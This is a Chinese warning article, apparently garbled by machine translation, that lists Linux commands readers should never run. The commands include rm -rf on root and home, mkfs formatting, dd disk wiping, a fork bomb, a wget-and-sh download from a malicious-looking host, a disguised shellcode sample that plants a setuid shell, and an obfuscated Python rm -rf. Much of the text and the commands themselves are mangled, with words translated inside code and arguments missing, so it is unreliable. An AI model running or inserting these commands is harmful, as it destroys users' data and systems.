千万千万不要运行Linux的命令

  

文中列出的命令绝对不可以运行,即使你觉得很好奇也不行,除非你是在虚拟机上运行(出现问题你可以还原),因为它们会实实在在的破坏你的系统。所以不根等在高级管理权限下执行命令是很好的习惯。

  

早晚有一天,Linux系统会像Windows那样流行,用的人越来越多,包括对计算机不是很了解的人,本文的目的就是告诉大家:在Linux给你最大程度自由度的同时,也使得破坏系统变得更加容易,如果你不了解某些命令的意义,下载执行包含恶意命令的脚本,或者被骗运行某些命令,很容易让你哭都来不及。

  

这并不是说明Linux不安全,只是说明在不了解Linux,和很不小心的人面前,Linux十分不安全.Windows也好,Linux也好,人本身才是最大的不安全因素。

  

下面的命令会删除你硬盘上的文件,rm的- r递归删除,和- f强制删除是很危险的选项,即使日常操作,也会遇到误删文件的情况。

  
 <代码类=" language-bash "> sudo rm射频/# #删除根分区全部的文件
  sudo rm射频。# #删除当前目录下的所有文件
  sudo rm rf * # #同上
  rm rf *或rm rf *。* # #同上
  rm射频~/,# #删除根分区和家目录,即使你不是根,家目录还是不能幸免。 
  

同样,如果你不知道mkfs。xxxx (xxxx可以是vfat、ext2、ext3、bfs……)是格式化命令的话,运行下面的命令会擦除你的硬盘分区:

  
 <代码类=" language-bash "> sudo mkfs.xxxx  
  

dd是强大的IO输入输出定向工具,如果使用不当,破坏性很大,不仅仅是当前分区,当前系统,有的时候是整个硬盘。

  
 <代码类=" language-bash "> sudo dd if=/dev/0=/dev/sda # #全部硬盘清零。
  sudo dd if=/dev/sda=/dev/sdb # #用第一块硬盘的内容覆盖第二块的内容。
  sudo dd如果=,=/dev/sda # #往硬盘上写垃圾数据。 
  

同理,直接把命令结果定向到硬盘上,相当于往硬盘上写垃圾数据:

  
 <代码类=" language-bash "> any_command祝辞sda用随意的数据破坏硬盘 
  

上面的sda,深发展也可能是其他类似的名称.Linux的/dev系统给操纵硬件提供了很方便和强大的功能,同时也使得破坏变得更容易。

  

叉命令打开一个子进程,如果把叉放在无限循环中,最终子进程会耗尽所有内存资源:

  
 <代码类=" language-bash ">:(){: |:和};: 
  

这段不知所云的符号,可以让壳牌不停的叉子进程,最后导致内存耗尽,不得不重启,这不是错误,只是壳牌语句故意写成简写的形式而已。下面的同理:

  
 <代码类=" c语言">叉,叉 
  

有的时候,压缩包也是一个破坏来源~

  

有的压缩包要求你解压到某个系统中已经存在的目录中,这时候你就要特别小心了,压缩包里面可能有成千上万的小文件,以各种文件名尝试覆盖你现有的文件。

  

有的压缩包看起来很小,但是解压出来是上GB的垃圾数据,会充斥你的硬盘。

  

从不正规网站下载的程序,脚本,同样会有包含恶意命令的危险,不可随便执行:

  
 <代码类=" language-bash "> wget [url] http://some_place/some_file [/url]
  sh。/some_file
  wget [url] http://hax018r.org/malicious-script [/url]
  sh。/恶意脚本代码 之前
  

载脚本要确保来源正规,如果有能力,可以阅读其代码。即使有源代码的程序,也不要随便编译执行:

  
 <代码类=" language-bash "> char esp [] __attribute__ (((。text)节))/* e.s.p
  发布*/=" xebx3ex5bx31xc0x50x54x5ax83xecx64x68 "
  “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
  “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
  “x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
  “x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
  “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
  “x6ex2fx73x68x00x2dx63x00”
  “cp - p/bin/sh/tmp/.beyond;chmod 4755/tmp/.beyond;”;  
  

上面看起来只是一堆没有意义的16进制数据,如果有人告诉你,运行这个程序你就可以不输入密码取得系统的根权限,你可不要相信他,上面的程序实际运行的是“rm射频~/,”。

  

python一类的脚本语言,同样可以拿来搞破坏:

  
 <代码类=" language-bash "> python - c的进口操作系统;os.system (" " . join(杆(奥德(i) 1)我在“sn .sg !"]))的 
  

这段程序实际上会执行rm射频,也许你很奇怪上面程序结尾的“sn .sg !“是什么意思,实际上就是rm射频每个字母的下一个!

  

那么我们如何避免运行恶意程序呢?

千万千万不要运行Linux的命令